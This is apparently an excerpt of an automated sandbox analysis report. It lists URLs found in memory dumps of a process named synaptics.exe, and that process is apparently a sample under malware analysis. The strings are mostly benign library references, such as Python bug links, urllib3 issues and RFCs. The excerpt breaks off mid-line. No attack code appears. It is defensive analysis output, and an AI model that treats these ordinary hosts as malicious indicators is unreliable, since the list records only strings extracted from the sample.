                Source: synaptics.exe, 00000014.00000003.2522185220.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2521705693.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2523194707.0000000000AF1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2522322435.0000000000ADD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://foo.com:/
                Source: synaptics.exe, 00000014.00000003.2617576664.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2619061825.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2619913019.0000000000B51000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2621884568.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2622302076.0000000001552000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2621884568.00000000016BD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2616802597.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2621521060.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                Source: synaptics.exe, 00000014.00000003.2616420842.0000000003818000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2613750411.0000000003818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
                Source: synaptics.exe, 00000014.00000003.2675863176.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2689040173.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2672783950.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2619061825.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2625802641.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2604902881.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2749852140.0000000000B86000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2665807066.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2678476168.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2621521060.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2738994032.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2745492829.0000000000B86000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2619417962.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2749100998.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2684561105.0000000000B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
                Source: synaptics.exe, 00000014.00000003.2616802597.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2621521060.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/7aaba721ebc0/Lib/socket.py#l252
                Source: synaptics.exe, 00000014.00000003.2749100998.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://host.name
                Source: synaptics.exe, 00000014.00000003.2631606979.0000000001934000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2601056030.000000000192A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2627071554.0000000001934000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2609858470.0000000001936000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2599185163.0000000001907000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2618104210.0000000001934000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2623557464.0000000001934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/j2se/1.5.0/docs/api/java/util/concurrent/
                Source: synaptics.exe, 00000014.00000003.2530742285.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mail.python.org/pipermail/python-bugs-list/2001-January/003752.html
                Source: synaptics.exe, 00000014.00000003.2639516326.00000000018F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pubs.opengroup.org/onlinepubs/009695399/basedefs/xbd_chap04.html#tag_04_11
                Source: synaptics.exe, 00000014.00000003.2631606979.0000000001934000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2601056030.000000000192A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2627071554.0000000001934000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2609858470.0000000001936000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2599185163.0000000001907000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2618104210.0000000001934000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2623557464.0000000001934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sourceware.org/pthreads-win32/manual/pthread_barrier_init.html
                Source: synaptics.exe, 00000014.00000003.2522185220.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2521705693.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2523194707.0000000000AF1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2522322435.0000000000ADD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5234#appendix-B.1
                Source: synaptics.exe, 00000014.00000003.2675863176.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2678476168.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2712854335.00000000016C0000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2676220591.000000000192C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2684561105.0000000000B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
                Source: synaptics.exe, 00000014.00000003.2522185220.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2521705693.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2523194707.0000000000AF1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2522322435.0000000000ADD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc7230#section-3.2)
                Source: synaptics.exe, 00000014.00000003.2639516326.00000000018F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.archive.org/web/20200623061726/https://bitbucket.org/pitrou/pathlib/issues/12/
                Source: synaptics.exe, 00000014.00000003.2539955000.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2541956815.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2541826132.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2538852735.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2539569161.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2541660625.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
                Source: synaptics.exe, 00000014.00000003.2512844280.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2514719540.0000000000C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.demo2s.com/Tutorial/Cpp/0380__set-multiset/Catalog0380__set-multiset.htm
                Source: synaptics.exe, 00000014.00000003.2512844280.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2514719540.0000000000C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gnu.org/software/smalltalk/manual-base/html_node/Bag.html
                Source: synaptics.exe, 00000014.00000003.2623323333.0000000001545000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/media-types
                Source: synaptics.exe, 00000014.00000003.2553352596.0000000001529000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2702048947.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2559046187.00000000016E3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2617576664.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2557067983.00000000016E3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2610844185.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2590473767.00000000016E3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2593269429.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2591275434.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2635460512.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2710705728.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2621704012.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2726427570.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2565092593.00000000016E6000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2565759692.00000000016E3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2554619703.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2553972759.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2646261005.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2743673267.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2554417159.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2652173634.00000000016CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                Source: synaptics.exe, 00000014.00000003.2539955000.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2541956815.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2541826132.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2548822658.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2545729196.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2546707152.0000000000AD2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2542238507.000000000154E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2543875670.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2539569161.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2550724245.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2541660625.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2547393423.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2549137681.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2551073215.0000000000B33000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2543768048.0000000000AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
                Source: synaptics.exe, 00000014.00000003.2539955000.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2541956815.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2541826132.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2538852735.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2539569161.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2541660625.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
                Source: synaptics.exe, 00000014.00000003.2666415324.0000000001948000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2652761780.0000000001948000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pkware.com/documents/casestudies/APPNOTE.TXT
                Source: synaptics.exe, 00000014.00000003.2705504110.000000000198D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2712422973.0000000001544000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2730254084.000000000190E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2717288570.00000000019BA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2713378866.0000000001A5D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2742061088.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2740898219.0000000001A5D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2718070490.0000000001907000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2703493115.00000000015E7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2725817031.000000000190D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2706037061.0000000001544000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2713378866.0000000001A66000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2710404089.000000000198D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2711655946.000000000196D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2711655946.000000000198D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2744411023.000000000190E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
                Source: synaptics.exe, 00000014.00000003.2740898219.0000000001A63000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2737936143.0000000001535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue20164
                Source: synaptics.exe, 00000014.00000003.2495528030.0000000000AF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue29585
                Source: synaptics.exe, 00000014.00000003.2527331333.0000000000B07000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2531202744.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2529041976.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2527110727.0000000000B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue31672
                Source: synaptics.exe, 00000014.00000003.2639516326.00000000018F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue39682
                Source: synaptics.exe, 00000014.00000003.2539955000.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2538852735.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2541660625.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/msg352381
                Source: synaptics.exe, 00000014.00000003.2687202668.000000000154E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.3/howto/logging.html#configuring-logging-for-a-library
                Source: synaptics.exe, 00000014.00000003.2616802597.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2621521060.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://erickt.github.io/blog/2014/11/19/adventures-in-debugging-a-potential-osx-kernel-bug/
                Source: synaptics.exe, 00000014.00000003.2606267033.0000000000C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3129
                Source: synaptics.exe, 00000014.00000003.2604902881.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2613750411.00000000037EE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2606267033.0000000000C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
                Source: synaptics.exe, 00000014.00000003.2533406112.0000000000B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gist.github.com/4325783
                Source: synaptics.exe, 00000014.00000003.2690368319.0000000001907000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2699376646.00000000018F7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2699907714.0000000001907000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.coN
                Source: synaptics.exe, 00000014.00000003.2690368319.0000000001907000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2699376646.00000000018F7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2699907714.0000000001907000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.coNN
                Source: synaptics.exe, 00000014.00000003.2690368319.0000000001907000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2699376646.00000000018F7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2730254084.000000000190E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2718070490.0000000001907000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2725817031.000000000190D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2699907714.0000000001907000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2744411023.000000000190E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Ousret/charset_normalizer
                Source: synaptics.exe, 00000014.00000003.2608349950.0000000000C30000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2606267033.0000000000C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/openssl/openssl/issues/14579
                Source: synaptics.exe, 00000014.00000003.2749100998.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/psf/requests/issues/1084
                Source: synaptics.exe, 00000014.00000003.2740898219.0000000001A63000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2737936143.0000000001535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/psf/requests/issues/1846
                Source: synaptics.exe, 00000014.00000003.2749100998.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/psf/requests/issues/3490
                Source: synaptics.exe, 00000014.00000003.2635460512.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2631052256.00000000016CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/pyopenssl/pull/933
                Source: synaptics.exe, 00000014.00000003.2500295004.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2501737363.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2502366395.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2500387441.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2507985486.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2502283168.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2500204082.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2509836397.0000000000AEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/417#issuecomment-392298401
                Source: synaptics.exe, 00000014.00000003.2625802641.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2627821618.00000000016CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/113199
                Source: synaptics.exe, 00000014.00000003.2558095690.0000000000BA4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2563295626.0000000000B8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/pull/7160#discussion_r195405230
                Source: synaptics.exe, 00000014.00000003.2594774367.0000000000AD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2168z(Andrey
                Source: synaptics.exe, 00000014.00000003.2604902881.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2613750411.00000000037EE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2606267033.0000000000C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
                Source: synaptics.exe, 00000014.00000003.2652617065.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2635897530.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2625802641.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2626064254.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2635768503.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2659715215.0000000000B56000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2627821618.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2629601575.00000000018E7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2742061088.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2646681174.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2681756928.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2672930458.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2626188130.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2631317671.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2668430759.0000000000B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
                Source: synaptics.exe, 00000014.00000003.2616802597.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2621521060.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2791
                Source: synaptics.exe, 00000014.00000003.2684280852.00000000016CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
                Source: synaptics.exe, 00000014.00000003.2594774367.0000000000AD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3020)
                Source: synaptics.exe, 00000014.00000003.2631052256.00000000016CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3267.
                Source: synaptics.exe, 00000014.00000003.2690368319.0000000001907000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2699376646.00000000018F7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2730254084.000000000190E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2718070490.0000000001907000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2725817031.000000000190D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2699907714.0000000001907000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2663690600.000000000190F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2634063079.000000000190F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2653018334.000000000190F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2658366203.000000000190F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2639516326.000000000190F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2744411023.000000000190E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
                Source: synaptics.exe, 00000014.00000003.2616802597.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2621521060.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/651
                Source: synaptics.exe, 00000014.00000003.2627821618.00000000016CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/pull/2624
                Source: synaptics.exe, 00000014.00000003.2606267033.0000000000C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/pull/3024
                Source: synaptics.exe, 00000014.00000003.2684280852.00000000016CE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2691397567.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2684561105.0000000000B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                Source: synaptics.exe, 00000014.00000003.2691596913.0000000003939000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2719616397.000000000385B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2684125738.0000000001BB1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2734524871.000000000385B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2702315091.0000000000B7A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2684280852.00000000016CE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2691397567.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2684561105.0000000000B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
                Source: synaptics.exe, 00000014.00000003.2613750411.0000000003818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
                Source: synaptics.exe, 00000014.00000003.2684280852.00000000016CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
                Source: synaptics.exe, 00000014.00000003.2749100998.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/get
                Source: synaptics.exe, 00000014.00000003.2702048947.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2617576664.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2610844185.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2635460512.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2710705728.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2621704012.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2726427570.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2594774367.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2646261005.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2743673267.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2652173634.00000000016CE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2731721891.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2627657717.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 